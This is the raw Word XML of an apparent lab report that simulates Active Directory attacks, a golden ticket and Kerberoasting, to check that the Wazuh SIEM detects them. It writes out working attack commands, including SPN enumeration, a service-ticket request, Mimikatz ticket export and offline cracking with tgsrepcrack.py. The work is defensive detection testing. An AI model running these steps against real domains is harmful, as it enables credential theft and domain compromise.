      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0013184B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>sid: → domain SID (check with whoami /user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DE7BA4" w14:textId="7C8519DF" w:rsidR="0013184B" w:rsidRPr="0013184B" w:rsidRDefault="0013184B" w:rsidP="0013184B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013184B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>/krbtgt: → hash of krbtgt account you dumped from DCSync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478F6E58" w14:textId="6C3A0E67" w:rsidR="0013184B" w:rsidRPr="00CB78F7" w:rsidRDefault="0013184B" w:rsidP="0013184B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/id:500 → RID for Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCD877C" w14:textId="77777777" w:rsidR="00CB78F7" w:rsidRPr="00CB78F7" w:rsidRDefault="00CB78F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB78F7">
        <w:t>Verify alert id 110003.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2411BD4E" w14:textId="2BBF22B2" w:rsidR="002E754F" w:rsidRPr="002E754F" w:rsidRDefault="00A420A2" w:rsidP="00A420A2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="073D6C9C" wp14:editId="020F9B22">
            <wp:extent cx="6644640" cy="2148840"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="9544952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2148840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A836F4E" w14:textId="77777777" w:rsidR="00CB78F7" w:rsidRPr="00CB78F7" w:rsidRDefault="00CB78F7" w:rsidP="00CB78F7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB78F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 7 — Review and Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F51E8CA" w14:textId="77777777" w:rsidR="00CB78F7" w:rsidRPr="00CB78F7" w:rsidRDefault="00CB78F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB78F7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirm alerts on </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB78F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Wazuh Dashboard</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB78F7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> and alerts.json.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145C64FA" w14:textId="77777777" w:rsidR="00CB78F7" w:rsidRPr="00CB78F7" w:rsidRDefault="00CB78F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB78F7">
        <w:t>Check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379A8B42" w14:textId="77777777" w:rsidR="00CB78F7" w:rsidRPr="00CB78F7" w:rsidRDefault="00CB78F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB78F7">
        <w:t>Event IDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDD44E9" w14:textId="77777777" w:rsidR="00CB78F7" w:rsidRPr="00CB78F7" w:rsidRDefault="00CB78F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB78F7">
        <w:t>Event properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A961A1" w14:textId="77777777" w:rsidR="00CB78F7" w:rsidRPr="00CB78F7" w:rsidRDefault="00CB78F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB78F7">
        <w:t>Alert levels and descriptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0213462B" w14:textId="77777777" w:rsidR="00CB78F7" w:rsidRPr="00CB78F7" w:rsidRDefault="00CB78F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB78F7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Ensure coverage for all attack simulations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6530477B" w14:textId="1AD113F3" w:rsidR="002E754F" w:rsidRPr="003870DB" w:rsidRDefault="00876DCA" w:rsidP="002E754F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E07648">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="002E754F" w:rsidRPr="00E07648">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Kerberoasting Attack Simulation</w:t>
      </w:r>
      <w:r w:rsidR="002E754F" w:rsidRPr="002E754F">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
        <w:t>To simulate a common Active Directory attack targeting service accounts and verify that Wazuh detects suspicious ticket requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08332103" w14:textId="77777777" w:rsidR="002E754F" w:rsidRPr="002E754F" w:rsidRDefault="002E754F" w:rsidP="002E754F">
      <w:r w:rsidRPr="002E754F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C863613" w14:textId="77777777" w:rsidR="002E754F" w:rsidRPr="002E754F" w:rsidRDefault="002E754F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E754F">
        <w:t>Python tgsrepcrack.py script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D54368" w14:textId="77777777" w:rsidR="002E754F" w:rsidRPr="002E754F" w:rsidRDefault="002E754F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E754F">
        <w:t>Windows Domain (WinServ.local)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1787B1B8" w14:textId="77777777" w:rsidR="002E754F" w:rsidRPr="002E754F" w:rsidRDefault="002E754F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E754F">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Password list including known service account password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB99784" w14:textId="77777777" w:rsidR="002E754F" w:rsidRPr="002E754F" w:rsidRDefault="002E754F" w:rsidP="002E754F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E754F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Steps Performed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3538A5" w14:textId="77777777" w:rsidR="00661885" w:rsidRDefault="002E754F" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E754F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Prepare Environment</w:t>
      </w:r>
      <w:r w:rsidRPr="002E754F">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00661885">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="002E754F">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>• Ensure Windows endpoint is joined to the domain WinServ.local.</w:t>
      </w:r>
      <w:r w:rsidRPr="002E754F">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00661885">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="002E754F">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>• Use a service account for the simulation.</w:t>
      </w:r>
      <w:r w:rsidRPr="002E754F">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00661885">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="002E754F">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>• Ensure Python is installed on the endpoint to run tgsrepcrack.py.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C1BB5D" w14:textId="0D3DE6EF" w:rsidR="003870DB" w:rsidRPr="003870DB" w:rsidRDefault="00D8320A" w:rsidP="00D8320A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8320A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Steps and Commands Executed</w:t>
      </w:r>
      <w:r w:rsidR="003870DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31367EB2" w14:textId="2243B67F" w:rsidR="00742A9D" w:rsidRPr="00A877B2" w:rsidRDefault="00D8320A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8320A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Run GetUserSPNs script to enumerate service accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E0AAED" w14:textId="20A8D97A" w:rsidR="00A877B2" w:rsidRPr="00A877B2" w:rsidRDefault="00A877B2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A877B2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Lists all accounts with Service Principal Names (SPNs) that can be targeted for offline password attacks. Helps identify high-value accounts such as service accounts.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grilledutableau"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10456"/>
      </w:tblGrid>
      <w:tr w:rsidR="00742A9D" w:rsidRPr="00742A9D" w14:paraId="6C241C86" w14:textId="77777777" w:rsidTr="00742A9D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="258EA386" w14:textId="77777777" w:rsidR="00742A9D" w:rsidRPr="00742A9D" w:rsidRDefault="00742A9D" w:rsidP="00742A9D">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00742A9D">
              <w:lastRenderedPageBreak/>
              <w:t>.\GetUserSPNs.ps1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0079242D" w14:textId="77777777" w:rsidR="00A877B2" w:rsidRDefault="00A877B2" w:rsidP="00A877B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DE38593" w14:textId="77D80FE9" w:rsidR="001E2C55" w:rsidRDefault="001E2C55" w:rsidP="00A877B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C46A853" wp14:editId="6BF17FB2">
            <wp:extent cx="6624955" cy="1898542"/>
            <wp:effectExtent l="0" t="0" r="4445" b="6985"/>
            <wp:docPr id="1732330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805" cy="1902511"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B01148" w14:textId="5E5EDAE1" w:rsidR="00D8320A" w:rsidRPr="00A877B2" w:rsidRDefault="00D8320A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8320A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Load required .NET assemblies for Kerberos request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6E435B" w14:textId="7A74FEB2" w:rsidR="00A877B2" w:rsidRPr="00A877B2" w:rsidRDefault="00A877B2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A877B2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Prepares PowerShell to create Kerberos tokens, simulating legitimate Kerberos authentication request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42A9D" w:rsidRPr="001E2C55" w14:paraId="2177E244" w14:textId="77777777" w:rsidTr="00742A9D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="642CB064" w14:textId="313928A5" w:rsidR="00742A9D" w:rsidRDefault="00742A9D" w:rsidP="00742A9D">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00D8320A">
              <w:t>Add-Type -AssemblyName System.IdentityModel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="031BBDF4" w14:textId="77777777" w:rsidR="00742A9D" w:rsidRPr="00D8320A" w:rsidRDefault="00742A9D" w:rsidP="00D8320A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E93BBDD" w14:textId="17D47695" w:rsidR="00D8320A" w:rsidRPr="00A877B2" w:rsidRDefault="00D8320A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8320A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Trigger Kerberos request using a service principal name (SPN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CD31D7" w14:textId="7A380C04" w:rsidR="00A877B2" w:rsidRDefault="00A877B2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A877B2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Requests a service ticket for the specified SPN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B26D66" w14:textId="6196B766" w:rsidR="00A877B2" w:rsidRPr="00A877B2" w:rsidRDefault="00A877B2" w:rsidP="00A877B2">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742A9D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E8"/>
      </w:r>
      <w:r w:rsidRPr="00A877B2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>This command triggered the Wazuh alert with rule.description: Possible Keberoasting attack.</w:t>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0461"/>
      </w:tblGrid>
      <w:tr w:rsidR="00742A9D" w:rsidRPr="001E2C55" w14:paraId="70A389F3" w14:textId="77777777" w:rsidTr="00742A9D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10461" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="15120DAE" w14:textId="10884B17" w:rsidR="00742A9D" w:rsidRPr="00742A9D" w:rsidRDefault="00742A9D" w:rsidP="00742A9D">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00742A9D">
              <w:t>New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/webserver.sfm.local"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43C86187" w14:textId="77777777" w:rsidR="00742A9D" w:rsidRPr="00D8320A" w:rsidRDefault="00742A9D" w:rsidP="00742A9D">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E742F66" w14:textId="55977804" w:rsidR="00D8320A" w:rsidRPr="00A877B2" w:rsidRDefault="00D8320A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8320A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Export Kerberos tickets from memory (Mimikatz)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C7FD6D" w14:textId="08674BB1" w:rsidR="00A877B2" w:rsidRPr="00A877B2" w:rsidRDefault="00A877B2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A877B2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Saves TGS tickets for offline analysis and cracking. Simulates the process an attacker uses to steal tickets without directly accessing the password.</w:t>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0461"/>
      </w:tblGrid>
      <w:tr w:rsidR="00742A9D" w14:paraId="4F27E38B" w14:textId="77777777" w:rsidTr="00742A9D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10461" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5490B977" w14:textId="560A616C" w:rsidR="00742A9D" w:rsidRPr="00742A9D" w:rsidRDefault="00742A9D" w:rsidP="00742A9D">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00D8320A">
              <w:t>kerberos::list /export</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B34706C" w14:textId="77777777" w:rsidR="00742A9D" w:rsidRDefault="00742A9D" w:rsidP="00EE4FDA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="071870CA" w14:textId="67A2600F" w:rsidR="00EE4FDA" w:rsidRDefault="00EE4FDA" w:rsidP="00EE4FDA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D35BF9A" wp14:editId="1CF2CAEC">
            <wp:extent cx="6522720" cy="2446020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30372401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360" cy="2450385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B8E33E" w14:textId="77777777" w:rsidR="00EE4FDA" w:rsidRPr="00D8320A" w:rsidRDefault="00EE4FDA" w:rsidP="00742A9D">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="355C018A" w14:textId="3C7A9BFC" w:rsidR="00D8320A" w:rsidRPr="00A877B2" w:rsidRDefault="00D8320A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8320A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Check exported ticket files in local directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22158AF4" w14:textId="436B63FE" w:rsidR="00A877B2" w:rsidRPr="00A877B2" w:rsidRDefault="00A877B2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A877B2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Ensures tickets are correctly exported and available for further testing or offline attacks.</w:t>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0461"/>
      </w:tblGrid>
      <w:tr w:rsidR="00742A9D" w:rsidRPr="001E2C55" w14:paraId="3A3EF48B" w14:textId="77777777" w:rsidTr="00742A9D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10461" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5857C575" w14:textId="6ADE6A83" w:rsidR="00742A9D" w:rsidRPr="00742A9D" w:rsidRDefault="00742A9D" w:rsidP="00742A9D">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00742A9D">
              <w:t>Get-ChildItem C:\Tools\mimikatz\*.kirbi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4EC8054C" w14:textId="77777777" w:rsidR="00EE4FDA" w:rsidRDefault="00EE4FDA" w:rsidP="00EE4FDA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6086B54C" w14:textId="1C9D4C6A" w:rsidR="00EE4FDA" w:rsidRPr="00D8320A" w:rsidRDefault="00EE4FDA" w:rsidP="00EE4FDA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45349B2D" wp14:editId="1CB9BD3B">
            <wp:extent cx="6629400" cy="987373"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1470919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7940" cy="1055667"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F13D0C4" w14:textId="7B7C4FEF" w:rsidR="00D8320A" w:rsidRPr="00A877B2" w:rsidRDefault="00D8320A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8320A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Attempt offline password cracking using tgsrepcrack.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632D9B5C" w14:textId="1FE17F26" w:rsidR="00A877B2" w:rsidRPr="00A877B2" w:rsidRDefault="00A877B2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A877B2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Uses the exported TGS ticket to attempt offline recovery of the account password. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A877B2">
        <w:t>Simulates real-world Kerberoasting attacks in a controlled lab environmen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42A9D" w:rsidRPr="001E2C55" w14:paraId="33452B34" w14:textId="77777777" w:rsidTr="00742A9D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
